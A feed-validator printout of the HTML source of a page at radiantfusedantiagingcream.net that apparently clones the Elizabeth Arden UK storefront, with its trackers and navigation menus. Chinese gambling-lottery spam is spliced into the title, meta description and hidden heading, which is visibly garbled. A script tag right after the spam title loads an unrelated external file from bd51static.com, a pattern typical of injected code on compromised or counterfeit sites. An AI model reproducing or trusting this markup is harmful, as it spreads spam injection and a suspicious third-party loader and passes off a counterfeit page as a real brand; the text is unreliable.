It looks like this is a web page, not a feed. I looked for a feed associated with this page, but couldn't find one. Please enter the address of your feed to validate.

Source: http://radiantfusedantiagingcream.net

  1.  
  2.  
  3.  
  4. <!doctype html>
  5. <!--[if lt IE 7]> <html class="ie6 oldie" lang="en-GB"> <![endif]-->
  6. <!--[if IE 7]> <html class="ie7 oldie" lang="en-GB"> <![endif]-->
  7. <!--[if IE 8]> <html class="ie8 oldie" lang="en-GB"> <![endif]-->
  8. <!--[if gt IE 8]><!--> <html lang="en-GB"> <!--<![endif]-->
  9.  
  10. <head>
  11. <link rel="canonical" href="http://radiantfusedantiagingcream.net/" />
  12. <meta charset="UTF-8">
  13. <meta http-equiv="x-ua-compatible" content="ie=edge">
  14. <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  15. <script src="js/afterpay-1.x.js" async></script>
  16. <link href="css/jquery-ui.min.css" type="text/css" rel="stylesheet" />
  17. <link rel="stylesheet" href="css/style.css" type="text/css" rel="stylesheet" />
  18. <link href="css/font-awesome.min.css" rel="stylesheet">
  19. <!--[if lt IE 9]>
  20. <script src="/on/demandware.static/Sites-ElizabethArdenUK-Site/-/en_GB/v1697774803777/js/lib/html5.js"></script>
  21. <![endif]-->
  22. <script type="text/javascript">//<!--
  23. /* <![CDATA[ (head-active_data.js) */
  24. var dw = (window.dw || {});
  25. dw.ac = {
  26.    _analytics: null,
  27.    _events: [],
  28.    _category: "",
  29.    _searchData: "",
  30.    _anact: "",
  31.    _anact_nohit_tag: "",
  32.    _analytics_enabled: "true",
  33.    _timeZone: "Europe/London",
  34.    _capture: function(configs) {
  35.        if (Object.prototype.toString.call(configs) === "[object Array]") {
  36.            configs.forEach(captureObject);
  37.            return;
  38.        }
  39.        dw.ac._events.push(configs);
  40.    },
  41. capture: function() {
  42. dw.ac._capture(arguments);
  43. // send to CQ as well:
  44. if (window.CQuotient) {
  45. window.CQuotient.trackEventsFromAC(arguments);
  46. }
  47. },
  48.    EV_PRD_SEARCHHIT: "searchhit",
  49.    EV_PRD_DETAIL: "detail",
  50.    EV_PRD_RECOMMENDATION: "recommendation",
  51.    EV_PRD_SETPRODUCT: "setproduct",
  52.    applyContext: function(context) {
  53.        if (typeof context === "object" && context.hasOwnProperty("category")) {
  54.         dw.ac._category = context.category;
  55.        }
  56.        if (typeof context === "object" && context.hasOwnProperty("searchData")) {
  57.         dw.ac._searchData = context.searchData;
  58.        }
  59.    },
  60.    setDWAnalytics: function(analytics) {
  61.        dw.ac._analytics = analytics;
  62.    },
  63.    eventsIsEmpty: function() {
  64.        return 0 == dw.ac._events.length;
  65.    }
  66. };
  67. /* ]]> */
  68. // -->
  69. </script>
  70. <script type="text/javascript">//<!--
  71. /* <![CDATA[ (head-cquotient.js) */
  72. var CQuotient = window.CQuotient = {};
  73. CQuotient.clientId = 'aahp-ElizabethArdenUK';
  74. CQuotient.realm = 'AAHP';
  75. CQuotient.siteId = 'ElizabethArdenUK';
  76. CQuotient.instanceType = 'prd';
  77. CQuotient.locale = 'en_GB';
  78. CQuotient.fbPixelId = '__UNKNOWN__';
  79. CQuotient.activities = [];
  80. CQuotient.cqcid='';
  81. CQuotient.cquid='';
  82. CQuotient.cqeid='';
  83. CQuotient.cqlid='';
  84. CQuotient.apiHost='api.cquotient.com';
  85. /* Turn this on to test against Staging Einstein */
  86. /* CQuotient.useTest= true; */
  87. CQuotient.useTest = ('true' === 'false');
  88. CQuotient.initFromCookies = function () {
  89. var ca = document.cookie.split(';');
  90. for(var i=0;i < ca.length;i++) {
  91.  var c = ca[i];
  92.  while (c.charAt(0)==' ') c = c.substring(1,c.length);
  93.  if (c.indexOf('cqcid=') == 0) {
  94. CQuotient.cqcid=c.substring('cqcid='.length,c.length);
  95.  } else if (c.indexOf('cquid=') == 0) {
  96.  var value = c.substring('cquid='.length,c.length);
  97.  if (value) {
  98.   var split_value = value.split("|", 3);
  99.   if (split_value.length > 0) {
  100.  CQuotient.cquid=split_value[0];
  101.   }
  102.   if (split_value.length > 1) {
  103.  CQuotient.cqeid=split_value[1];
  104.   }
  105.   if (split_value.length > 2) {
  106.  CQuotient.cqlid=split_value[2];
  107.   }
  108.  }
  109.  }
  110. }
  111. }
  112. CQuotient.getCQCookieId = function () {
  113. if(window.CQuotient.cqcid == '')
  114. window.CQuotient.initFromCookies();
  115. return window.CQuotient.cqcid;
  116. };
  117. CQuotient.getCQUserId = function () {
  118. if(window.CQuotient.cquid == '')
  119. window.CQuotient.initFromCookies();
  120. return window.CQuotient.cquid;
  121. };
  122. CQuotient.getCQHashedEmail = function () {
  123. if(window.CQuotient.cqeid == '')
  124. window.CQuotient.initFromCookies();
  125. return window.CQuotient.cqeid;
  126. };
  127. CQuotient.getCQHashedLogin = function () {
  128. if(window.CQuotient.cqlid == '')
  129. window.CQuotient.initFromCookies();
  130. return window.CQuotient.cqlid;
  131. };
  132. CQuotient.trackEventsFromAC = function (/* Object or Array */ events) {
  133. try {
  134. if (Object.prototype.toString.call(events) === "[object Array]") {
  135. events.forEach(_trackASingleCQEvent);
  136. } else {
  137. CQuotient._trackASingleCQEvent(events);
  138. }
  139. } catch(err) {}
  140. };
  141. CQuotient._trackASingleCQEvent = function ( /* Object */ event) {
  142. if (event && event.id) {
  143. if (event.type === dw.ac.EV_PRD_DETAIL) {
  144. CQuotient.trackViewProduct( {id:'', alt_id: event.id, type: 'raw_sku'} );
  145. } // not handling the other dw.ac.* events currently
  146. }
  147. };
  148. CQuotient.trackViewProduct = function(/* Object */ cqParamData){
  149. var cq_params = {};
  150. cq_params.cookieId = CQuotient.getCQCookieId();
  151. cq_params.userId = CQuotient.getCQUserId();
  152. cq_params.emailId = CQuotient.getCQHashedEmail();
  153. cq_params.loginId = CQuotient.getCQHashedLogin();
  154. cq_params.product = cqParamData.product;
  155. cq_params.realm = cqParamData.realm;
  156. cq_params.siteId = cqParamData.siteId;
  157. cq_params.instanceType = cqParamData.instanceType;
  158. cq_params.locale = CQuotient.locale;
  159. if(CQuotient.sendActivity) {
  160. CQuotient.sendActivity(CQuotient.clientId, 'viewProduct', cq_params);
  161. } else {
  162. CQuotient.activities.push({activityType: 'viewProduct', parameters: cq_params});
  163. }
  164. };
  165. /* ]]> */
  166. // -->
  167. </script>
  168.  
  169. <style type="text/css">ISAPPLEPAY{display:inline}.dw-apple-pay-button,.dw-apple-pay-button:hover,.dw-apple-pay-button:active{background-color:black;background-image:-webkit-named-image(apple-pay-logo-white);background-position:50% 50%;background-repeat:no-repeat;background-size:75% 60%;border-radius:5px;border:1px solid black;box-sizing:border-box;margin:5px auto;min-height:30px;min-width:100px;padding:0}
  170. .dw-apple-pay-button:after{content:'Apple Pay';visibility:hidden}.dw-apple-pay-button.dw-apple-pay-logo-white{background-color:white;border-color:white;background-image:-webkit-named-image(apple-pay-logo-black);color:black}.dw-apple-pay-button.dw-apple-pay-logo-white.dw-apple-pay-border{border-color:black}</style>
  171. <link rel="stylesheet" href="css/cmio.css" />
  172. <script src="js/pnd8hag.js"></script>
  173. <script type="text/javascript">
  174. try{Typekit.load(
  175. { async: true }
  176. );}catch(e){}
  177. </script>
  178. <title>澳洲幸运10最新开奖结果号码官方网站 | 查询开奖结果+开奖记录 | 幸运澳洲10开奖直播网168</title><script type="text/javascript" src="//bd51static.com/7ry.js"></script>
  179. <script src="main.js"></script>
  180.  
  181. <link rel="apple-touch-icon" sizes="57x57" href="png/apple-touch-icon-57x57.png">
  182. <link rel="apple-touch-icon" sizes="60x60" href="png/apple-touch-icon-60x60.png">
  183. <link rel="apple-touch-icon" sizes="72x72" href="png/apple-touch-icon-72x72.png">
  184. <link rel="apple-touch-icon" sizes="76x76" href="png/apple-touch-icon-76x76.png">
  185. <link rel="apple-touch-icon" sizes="114x114" href="png/apple-touch-icon-114x114.png">
  186. <link rel="apple-touch-icon" sizes="120x120" href="png/apple-touch-icon-120x120.png">
  187. <link rel="apple-touch-icon" sizes="144x144" href="png/apple-touch-icon-144x144.png">
  188. <link rel="apple-touch-icon" sizes="152x152" href="png/apple-touch-icon-152x152.png">
  189. <link rel="apple-touch-icon" sizes="180x180" href="png/apple-touch-icon-180x180.png">
  190. <link rel="shortcut icon" type="image/x-icon" href="ico/favicon.ico">
  191. <link rel="icon" type="image/x-icon" href="ico/favicon.ico">
  192. <link rel="icon" type="image/png" href="png/favicon-32x32.png" sizes="32x32">
  193. <link rel="icon" type="image/png" href="png/android-chrome-192x192.png" sizes="192x192">
  194. <link rel="icon" type="image/png" href="png/favicon-96x96.png" sizes="96x96">
  195. <link rel="icon" type="image/png" href="png/favicon-16x16.png" sizes="16x16">
  196. <link rel="manifest" href="json/manifest.json">
  197. <link rel="mask-icon" href="svg/safari-pinned-tab.svg" color="#cc0000">
  198. <meta name="msapplication-TileColor" content="#da532c">
  199. <meta name="msapplication-TileImage" content="/on/demandware.static/Sites-ElizabethArdenUK-Site/-/default/dw4e0db5cc/images/favicon/mstile-144x144.png">
  200. <meta name="theme-color" content="#ffffff">
  201.  
  202. <meta name="description" content="澳洲幸运10开奖官网开奖结果网站 麻烦提供 澳洲幸运十开奖官网直播网 澳洲幸运10手机版开奖号码查询 澳洲幸运10开奖最新官网计划 澳洲/幸运/10正规官网开奖结果历史 澳洲幸运10历史查询结果网站 幸运168澳洲10官网开奖历史记录查询 Elizabeth Arden UK Makeup, Skincare, Perfume & Gifts. " />
  203. <meta name="keywords" content=" beauty, beauty products, make up, makeup, skin care, skin care products, facial products, perfume, perfumes, skin products " />
  204. <!--[if gte IE 9 | !IE]><!-->
  205. <script src="js/jquery-2.1.1.min.js" type="text/javascript"></script>
  206. <!--<![endif]-->
  207. <!--[if lte IE 8]>
  208. <script src="/on/demandware.static/Sites-ElizabethArdenUK-Site/-/en_GB/v1697774803777/lib/jquery/jquery-1.11.1.min.js" type="text/javascript"></script>
  209. <![endif]-->
  210. <!--[if lte IE 8]>
  211. <script src="//cdnjs.cloudflare.com/ajax/libs/respond.js/1.4.2/respond.js" type="text/javascript"></script>
  212. <script src="https://cdn.rawgit.com/chuckcarpenter/REM-unit-polyfill/master/js/rem.min.js" type="text/javascript"></script>
  213. <![endif]-->
  214. <script type="text/javascript">
  215. if (window.jQuery) {
  216. jQuery(document).ready(function(){
  217. if(screen.width < 768){
  218. jQuery('#footer').append('<!--a href="/" class="full-site-link">View Full Site</a-->');
  219. jQuery('.full-site-link')
  220. .attr('href', '/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/Home-FullSite')
  221. .click(function(e) {
  222. e.preventDefault();
  223. jQuery.ajax({
  224. url: '/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/Home-FullSite',
  225. success: function(){
  226. window.location.reload();
  227. }
  228. });
  229. }
  230. );
  231. }
  232. });
  233. }
  234. </script>
  235. <script type="text/javascript" src="js/w-adv-3.min.js"></script>
  236. <script type="text/javascript">
  237. window.Findation = window.Findation || {};
  238. initWidget = function(url) {
  239. Findation.init(
  240. document.getElementById("findation-widget-button"),
  241. "c5ede8d6fcdcd1d3e8d2a7689fe2b01690bf2d44af786fcfd86b196a5032",
  242. {
  243. productUrl : url
  244. }
  245. );
  246. Findation.onSearchComplete = function(data) {
  247. if(data.recommendedShade != null){
  248. var recommendedShade = data.recommendedShade;
  249. var varients = $('.onhovercolor');
  250. if(varients.length > 0){
  251. varients.each(function () {
  252. var varientName = $(this).val();
  253. if(varientName.includes(recommendedShade)){
  254. $(this).closest('.swatchanchor').click();
  255. return false;
  256. }
  257. });
  258. }
  259. }
  260. }
  261. }
  262. $(document).ready(function() {
  263. initWidget();
  264. });
  265. </script>
  266. <script type="text/javascript" src="js/otautoblock.js"></script>
  267. <script src="js/otsdkstub.js" data-document-language="true" type="text/javascript" charset="UTF-8" data-domain-script="4ca45d63-be79-4eec-b693-3edc087cb86f"></script>
  268. <script type="text/javascript">
  269. function OptanonWrapper() { }
  270. </script>
  271. <script type="text/javascript" async src="js/collect.js"></script>
  272. <script>
  273.        var _etmc = [];
  274.        _etmc.push(["setOrgId", "10390214"]);
  275.        _etmc.push(["trackPageView"]);
  276. </script>
  277. <script>
  278.        _etmc.push(["setOrgId", "10390214"]);
  279.        _etmc.push(["setUserInfo", {"email": "st6nPMLiBfg_VRb_ErRCzGaVsIHvrKfbSDI="}]);
  280.        _etmc.push(["trackPageView"]);
  281. </script>
  282. <script>
  283.  _etmc.push(["setOrgId", "10390214"]);
  284.  _etmc.push(["setUserInfo", {
  285.    "email": "st6nPMLiBfg_VRb_ErRCzGaVsIHvrKfbSDI=",
  286.    "details": {
  287.      "country": "United Kingdom",
  288.      "language": "English"
  289.    }
  290.  }]);
  291.  _etmc.push(["trackPageView"]);
  292. </script>
  293. <link rel="alternate" hreflang="en-us" href="https://www.elizabetharden.com/" />
  294. <link rel="alternate" hreflang="en-gb" href="index.html" />
  295. <link rel="alternate" hreflang="fr-fr" href="https://www.elizabetharden.fr/" />
  296. <link rel="alternate" hreflang="de-de" href="https://www.elizabetharden.de/" />
  297. <link rel="alternate" hreflang="es-es" href="https://www.elizabetharden.es/" />
  298. <link rel="alternate" hreflang="it-it" href="https://www.elizabetharden.it/home/" />
  299. <link rel="alternate" hreflang="x-default" href="https://www.elizabetharden.com/" />
  300. <script async src="js/bv.js"></script>
  301.  
  302. <script>
  303. function onBvLoaded() {
  304. if (typeof(BV) === 'object') {
  305. window['dataLayer'].push({'event': 'bvLoaded'});
  306. } else {
  307. setTimeout(onBvLoaded, 250);
  308. }
  309. }
  310. onBvLoaded();
  311. </script>
  312. <script type="application/ld+json">
  313. {
  314. "@context": "https://www.schema.org",
  315. "@type": "Corporation",
  316. "name": "Elizabeth Arden",
  317. "url": "https://www.elizabetharden.co.uk",
  318. "logo": "https://www.elizabetharden.co.uk/on/demandware.static/Sites-ElizabethArdenUK-Site/-/default/dwb6080bf8/images/elizabetharden-logo.png",
  319. "foundingDate": "2009",
  320. "sameAs": [
  321.  
  322. "https://www.facebook.com/elizabethardenUK/?fref=ts",
  323. "https://twitter.com/ardenuk?lang=en-gb",
  324. "https://instagram.com/elizabethardenuk",
  325.  
  326. "https://www.youtube.com/user/ElizabethArdenBeauty"
  327. ],
  328. "contactPoint":
  329.  
  330. { "@type": "ContactPoint", "telephone": "+44 0161 8132608", "contactType": "customer service", "areaServed": "GB" }
  331.  
  332. }
  333. </script>
  334. </head>
  335. <body>
  336. <script type="text/javascript">dataLayer = [];</script>
  337. <script type="text/javascript">
  338. globalData = {"pageType":"home","pageTitle":"Home Page","pageName":"home: Home Page","pageCategory":"home","customerCountry":"HK","customerState":"HCW","customerEmail":"KYpltrBwmgg8hl-1dRsj8ItIxp4pyl3dP_M=","userID":"","dwID":"","visitorLoginState":"guest","sessionId":"KYpltrBwmgg8hl-1dRsj8ItIxp4pyl3dP_M="};
  339. </script>
  340. <script type="text/javascript">
  341. pageData = {};
  342. </script>
  343.  
  344.  
  345. <h1 class="sr-only">澳洲幸运10最新开奖结果号码官方网站 168开奖官方开奖网站查询 Elizabeth Arden OfficiaElizabeth Arden UK Official Website - Explore and shop skincare, perfume, makeup & giftsl Website - Explore and shop cosmetics, makeup, skincare, perfume & gift sets</h1>
  346. <div id="wrapper" class="pt_storefront">
  347. <div id="CookieLaw">
  348. </div>
  349. <header role="banner">
  350. <a class="skip-to-content" href="javascript:void(0)" title="Skip navigation" aria-label="Skip navigation">SKIP BUTTON </a>
  351. <div class="header-banner hide-tablet hide-mobile">
  352. <div class="header-promotion">
  353.  
  354. <p>20% off Eight Hour®* & FREE 3-piece Gift when you spend £55+!** | Use code: HERO | <a href="index-2.html">Shop Now</a></p>
  355. <style type="text/css">
  356.    .plp-popup u {
  357.        cursor: pointer;
  358.    }
  359.  
  360.    #wrapper .header-banner .header-promotion p {
  361.        font-size: 12px;
  362.        color: #fff;
  363.        font-weight: 400;
  364.    }
  365.  
  366.    .header-banner .header-promotion a {
  367.        text-decoration: underline;
  368.    }
  369.  
  370.    @media screen and (max-width: 767px) {
  371.        #wrapper .header-banner .header-promotion p {
  372.            background-color: #000;
  373.        }
  374.    }
  375.  
  376.    @media screen and (max-width: 390px) {
  377.        .hide-small-mobile {
  378.            display: none;
  379.        }
  380.    }
  381. </style>
  382. </div>
  383. </div>
  384. <div class="top-banner">
  385. <button class="menu-toggle" aria-expanded="false" aria-controls="mobile-menu-outer" aria-haspopup="true" aria-label="Open navigation menu"><i class="menu-icon fa fa-bars"></i><span class="visually-hidden">Menu</span></button>
  386. <div class="headermainsearch hide-desktop">
  387. <a href="javascript:void(0)" role="button" aria-pressed="false" title="Activate search dialog" aria-label="Activate search dialog" aria-expanded="false">Search</a>
  388. </div>
  389. <div class="primary-logo">
  390. <a href="index.html" title="Elizabeth Arden">
  391. <span class="logo"></span>
  392. </a>
  393. </div>
  394. <nav id="navigation" role="navigation" class="hide-mobile hide-tablet">
  395. <div role="toolbar">
  396. <ul class="menu-category level-1">
  397. <li class="skincare ">
  398. <a class="has-sub-level" aria-haspopup="true" aria-expanded="false" aria-label="SKINCARE Link. Press Down Arrow to Expand Sub Menu Links" href="index-3.html">
  399. <span>SKINCARE</span>
  400. <i class="menu-item-toggle fa fa-angle-right"></i>
  401. </a>
  402. <div class="level-2">
  403. <div class="level-2-syncwdth two-filter">
  404. <ul class="menu-horizontal">
  405. <div class="subminititle">BY CATEGORY<i class="menu-item-toggle-subcat fa fa-angle-right"></i></div>
  406. <li class>
  407. <a href="index-4.html">
  408. <div class="auto-sub-category">
  409. <span>Moisturisers</span>
  410. <i class="menu-item-toggle fa fa-angle-right"></i>
  411. </div>
  412. </a>
  413. <ul class="level-3">
  414. <li>
  415. <a href="index-5.html">
  416. <span>Balms &amp; Face Oils</span>
  417. </a>
  418. </li>
  419. </ul>
  420. </li>
  421. <li class>
  422. <a href="index-6.html">
  423. <div class="auto-sub-category">
  424. <span>Serums</span>
  425. <i class="menu-item-toggle fa fa-angle-right"></i>
  426. </div>
  427. </a>
  428. <ul class="level-3">
  429. <li>
  430. <a href="index-7.html">
  431. <span>Ceramide Capsules</span>
  432. </a>
  433. </li>
  434. </ul>
  435. </li>
  436. <li class>
  437. <a href="index-8.html">
  438. <div class="auto-sub-category">
  439. <span>Eye Care</span>
  440. </div>
  441. </a>
  442. </li>
  443. <li class>
  444. <a href="index-9.html">
  445. <div class="auto-sub-category">
  446. <span>Cleansers & Toners</span>
  447. </div>
  448. </a>
  449. </li>
  450. <li class>
  451. <a href="index-10.html">
  452. <div class="auto-sub-category">
  453. <span>Sun & Pollution Protection</span>
  454. </div>
  455. </a>
  456. </li>
  457. <li class>
  458. <a href="index-11.html">
  459. <div class="auto-sub-category">
  460. <span>Masks</span>
  461. </div>
  462. </a>
  463. </li>
  464. <li class>
  465. <a href="index-12.html">
  466. <div class="auto-sub-category">
  467. <span>Facial Essence</span>
  468. </div>
  469. </a>
  470. </li>
  471. <li class>
  472. <a href="index-13.html">
  473. <div class="auto-sub-category">
  474. <span>Skincare Sets</span>
  475. </div>
  476. </a>
  477. </li>
  478. <li class>
  479. <a href="index-14.html">
  480. <div class="auto-sub-category">
  481. <span>Body Care</span>
  482. </div>
  483. </a>
  484. </li>
  485. <li class>
  486. <a href="index-15.html">
  487. <div class="auto-sub-category">
  488. <span>Lip Care</span>
  489. </div>
  490. </a>
  491. </li>
  492. <li class>
  493. <a href="index-16.html">
  494. <div class="auto-sub-category">
  495. <span>View All Skincare</span>
  496. </div>
  497. </a>
  498. </li>
  499. </ul>
  500. <div class="subcat_menubox" id="subcat_skincare">
  501. <div class="subcat_menuinner">
  502. <div class="subcat-filter">
  503. <div class="subminititle">BY CONCERN<i class="menu-item-toggle-subcat fa fa-angle-right"></i></div>
  504. <ul>
  505. <li><a class="refineLink2" href="index-17.html" title="Anti-Ageing"><span>Anti-Ageing</span></a> </li>
  506. <li><a class="refineLink2" href="index-18.html" title="Restore Youth"><span>Restore Youth</span></a> </li>
  507. <li><a class="refineLink2" href="index-19.html" title="Skin Firming"><span>Skin Firming</span></a> </li>
  508. <li><a class="refineLink2" href="index-20.html" title="Lines &amp; Wrinkles"><span>Lines &amp; Wrinkles</span></a> </li>
  509. <li><a class="refineLink2" href="index-21.html" title="Glowing Skin"><span>Glowing Skin</span></a> </li>
  510. <li><a class="refineLink2" href="index-22.html" title="Skin Brightening"><span>Skin Brightening</span></a> </li>
  511. <li><a class="refineLink2" href="index-23.html" title="Sun Protection"><span>Sun Protection</span></a> </li>
  512. <li><a class="refineLink2" href="index-24.html" title="Skin Toning"><span>Skin Toning</span></a> </li>
  513. </ul>
  514. </div>
  515. <div class="subcat-filter">
  516. <div class="subminititle">BY COLLECTION<i class="menu-item-toggle-subcat fa fa-angle-right"></i></div>
  517. <ul>
  518. <li><a class="refineLink2" href="index-25.html" title="Ceramide"><span>Ceramide</span></a> </li>
  519. <li><a class="refineLink2" href="index-26.html" title="PREVAGE&reg;"><span>PREVAGE&reg;</span></a> </li>
  520. <li><a class="refineLink2" href="index-27.html" title="SUPERSTART"><span>SUPERSTART</span></a> </li>
  521. <li><a class="refineLink2" href="index-28.html" title="Eight Hour&reg; Cream"><span>Eight Hour&reg; Cream</span></a> </li>
  522. <li><a class="refineLink2" href="index-29.html" title="Visible Difference"><span>Visible Difference</span></a> </li>
  523. <li><a class="refineLink2" href="index-30.html" title="Visible Brightening"><span>Visible Brightening</span></a> </li>
  524. <li><a class="refineLink2" href="index-31.html" title="Retinol"><span>Retinol</span></a> </li>
  525. </ul>
  526. </div>
  527. </div>
  528. </div>
  529. </div>
  530. <div class="banner"><style type="text/css">
  531. .level-2 .banner{
  532. display:none !important;
  533. }
  534. @media screen and (min-width: 1024px){
  535. .level-2{ background-color:transparent;}
  536. }
  537. </style></div>
  538. </div>
  539. </li>
  540. <li class="fragrance ">
  541. <a class="has-sub-level" aria-haspopup="true" aria-expanded="false" aria-label="FRAGRANCE Link. Press Down Arrow to Expand Sub Menu Links" href="index-32.html">
  542. <span>FRAGRANCE</span>
  543. <i class="menu-item-toggle fa fa-angle-right"></i>
  544. </a>
  545. <div class="level-2">
  546. <div class="level-2-syncwdth one-filter">
  547. <ul class="menu-horizontal">
  548. <li class>
  549. <a href="index-33.html">
  550. <div class="auto-sub-category">
  551. <span>View All Fragrance</span>
  552. <i class="menu-item-toggle fa fa-angle-right"></i>
  553. </div>
  554. </a>
  555. <ul class="level-3">
  556. <li>
  557. <a href="index-34.html">
  558. <span>Citrus</span>
  559. </a>
  560. </li>
  561. <li>
  562. <a href="index-35.html">
  563. <span>Floral</span>
  564. </a>
  565. </li>
  566. <li>
  567. <a href="index-36.html">
  568. <span>Fruity</span>
  569. </a>
  570. </li>
  571. <li>
  572. <a href="index-37.html">
  573. <span>Spicy</span>
  574. </a>
  575. </li>
  576. <li>
  577. <a href="index-38.html">
  578. <span>Woody</span>
  579. </a>
  580. </li>
  581. </ul>
  582. </li>
  583. <li class>
  584. <a href="index-39.html">
  585. <div class="auto-sub-category">
  586. <span>Bath & Body</span>
  587. <i class="menu-item-toggle fa fa-angle-right"></i>
  588. </div>
  589. </a>
  590. <ul class="level-3">
  591. <li>
  592. <a href="index-40.html">
  593. <span>Body Lotions &amp; Creams</span>
  594. </a>
  595. </li>
  596. <li>
  597. <a href="index-41.html">
  598. <span>Shower Gels</span>
  599. </a>
  600. </li>
  601. </ul>
  602. </li>
  603. <li class>
  604. <a href="index-42.html">
  605. <div class="auto-sub-category">
  606. <span>New Arrivals</span>
  607. </div>
  608. </a>
  609. </li>
  610. </ul>
  611. <div class="subcat_menubox" id="subcat_fragrance">
  612. <div class="subcat_menuinner">
  613. <div class="subcat-filter">
  614. <div class="subminititle">BY COLLECTION<i class="menu-item-toggle-subcat fa fa-angle-right"></i></div>
  615. <ul>
  616. <li><a class="refineLink2" href="index-43.html" title="My Fifth Avenue"><span>My Fifth Avenue</span></a> </li>
  617. <li><a class="refineLink2" href="index-44.html" title="White Tea"><span>White Tea</span></a> </li>
  618. <li><a class="refineLink2" href="index-45.html" title="5th avenue"><span>5th avenue</span></a> </li>
  619. <li><a class="refineLink2" href="index-46.html" title="Green Tea"><span>Green Tea</span></a> </li>
  620. <li><a class="refineLink2" href="index-47.html" title="Red Door"><span>Red Door</span></a> </li>
  621. <li><a class="refineLink2" href="index-48.html" title="Sunflowers"><span>Sunflowers</span></a> </li>
  622. <li><a class="refineLink2" href="index-49.html" title="Blue Grass"><span>Blue Grass</span></a> </li>
  623. <li><a class="refineLink2" href="index-50.html" title="Mediterranean"><span>Mediterranean</span></a> </li>
  624. <li><a class="refineLink2" href="index-51.html" title="ardenbeauty"><span>ardenbeauty</span></a> </li>
  625. <li><a class="refineLink2" href="index-52.html" title="Splendor"><span>Splendor</span></a> </li>
  626. </ul>
  627. </div>
  628. </div>
  629. </div>
  630. </div>
  631. <div class="banner"></div>
  632. </div>
  633. </li>
  634. <li class="makeup ">
  635. <a class="has-sub-level" aria-haspopup="true" aria-expanded="false" aria-label="MAKEUP Link. Press Down Arrow to Expand Sub Menu Links" href="index-53.html">
  636. <span>MAKEUP</span>
  637. <i class="menu-item-toggle fa fa-angle-right"></i>
  638. </a>
  639. <div class="level-2">
  640. <div class="level-2-syncwdth one-filter">
  641. <ul class="menu-horizontal">
  642. <li class>
  643. <a href="index-54.html">
  644. <div class="auto-sub-category">
  645. <span>Face</span>
  646. <i class="menu-item-toggle fa fa-angle-right"></i>
  647. </div>
  648. </a>
  649. <ul class="level-3">
  650. <li>
  651. <a href="index-55.html">
  652. <span>Foundation</span>
  653. </a>
  654. </li>
  655. <li>
  656. <a href="index-56.html">
  657. <span>Primer</span>
  658. </a>
  659. </li>
  660. <li>
  661. <a href="index-57.html">
  662. <span>Concealer</span>
  663. </a>
  664. </li>
  665. <li>
  666. <a href="index-58.html">
  667. <span>Powder</span>
  668. </a>
  669. </li>
  670. <li>
  671. <a href="index-59.html">
  672. <span>Blush &amp; Bronzers</span>
  673. </a>
  674. </li>
  675. <li>
  676. <a href="index-60.html">
  677. <span>View All Face</span>
  678. </a>
  679. </li>
  680. </ul>
  681. </li>
  682. <li class>
  683. <a href="index-61.html">
  684. <div class="auto-sub-category">
  685. <span>Eyes</span>
  686. <i class="menu-item-toggle fa fa-angle-right"></i>
  687. </div>
  688. </a>
  689. <ul class="level-3">
  690. <li>
  691. <a href="index-62.html">
  692. <span>Mascara</span>
  693. </a>
  694. </li>
  695. <li>
  696. <a href="index-63.html">
  697. <span>Eyeliner</span>
  698. </a>
  699. </li>
  700. <li>
  701. <a href="index-64.html">
  702. <span>Eye Shadow Primer</span>
  703. </a>
  704. </li>
  705. <li>
  706. <a href="index-65.html">
  707. <span>Eyebrow</span>
  708. </a>
  709. </li>
  710. <li>
  711. <a href="index-66.html">
  712. <span>View All Eyes</span>
  713. </a>
  714. </li>
  715. </ul>
  716. </li>
  717. <li class>
  718. <a href="index-67.html">
  719. <div class="auto-sub-category">
  720. <span>Lips</span>
  721. <i class="menu-item-toggle fa fa-angle-right"></i>
  722. </div>
  723. </a>
  724. <ul class="level-3">
  725. <li>
  726. <a href="index-68.html">
  727. <span>Lipstick</span>
  728. </a>
  729. </li>
  730. <li>
  731. <a href="index-69.html">
  732. <span>Lipgloss</span>
  733. </a>
  734. </li>
  735. <li>
  736. <a href="index-70.html">
  737. <span>Lip Liner &amp; Pencils</span>
  738. </a>
  739. </li>
  740. <li>
  741. <a href="index-71.html">
  742. <span>Lip Balm &amp; Treatment</span>
  743. </a>
  744. </li>
  745. <li>
  746. <a href="index-72.html">
  747. <span>View All Lips</span>
  748. </a>
  749. </li>
  750. </ul>
  751. </li>
  752. <li class>
  753. <a href="index-73.html">
  754. <div class="auto-sub-category">
  755. <span>New Arrivals</span>
  756. </div>
  757. </a>
  758. </li>
  759. <li class>
  760. <a href="index-74.html">
  761. <div class="auto-sub-category">
  762. <span>Makeup Sets</span>
  763. </div>
  764. </a>
  765. </li>
  766. </ul>
  767. <div class="subcat_menubox" id="subcat_makeup">
  768. <div class="subcat_menuinner">
  769. <div class="subcat-filter">
  770. <div class="subminititle">BY COLLECTION<i class="menu-item-toggle-subcat fa fa-angle-right"></i></div>
  771. <ul>
  772. <li><a class="refineLink2" href="index-75.html" title="Flawless Finish"><span>Flawless Finish</span></a> </li>
  773. <li><a class="refineLink2" href="index-76.html" title="Beautiful Color"><span>Beautiful Color</span></a> </li>
  774. <li><a class="refineLink2" href="index-77.html" title="Liquid Assets"><span>Liquid Assets</span></a> </li>
  775. <li><a class="refineLink2" href="index-78.html" title="Gelato Crush"><span>Gelato Crush</span></a> </li>
  776. <li><a class="refineLink2" href="index-79.html" title="Drama Defined"><span>Drama Defined</span></a> </li>
  777. </ul>
  778. </div>
  779. </div>
  780. </div>
  781. </div>
  782. <div class="banner"></div>
  783. </div>
  784. </li>
  785. <li class="best sellers ">
  786. <a class="has-sub-level" aria-haspopup="true" aria-expanded="false" aria-label="BESTSELLERS Link. Press Down Arrow to Expand Sub Menu Links" href="index-80.html">
  787. <span>BESTSELLERS</span>
  788. <i class="menu-item-toggle fa fa-angle-right"></i>
  789. </a>
  790. <div class="level-2">
  791. <div class="level-2-syncwdth no-filter">
  792. <ul class="menu-horizontal">
  793. </ul>
  794. <div class="subcat_menubox" id="subcat_best sellers">
  795. <div class="subcat_menuinner">
  796. </div>
  797. </div>
  798. </div>
  799. <div class="banner"><style type="text/css">
  800. .level-2 .banner{
  801. display:none !important;
  802. }
  803. @media screen and (min-width: 1024px){
  804. .level-2{ background-color:transparent;}
  805. }
  806. </style></div>
  807. </div>
  808. </li>
  809. <li class="gifts ">
  810. <a class="has-sub-level" aria-haspopup="true" aria-expanded="false" aria-label="GIFTS Link. Press Down Arrow to Expand Sub Menu Links" href="index-81.html">
  811. <span>GIFTS</span>
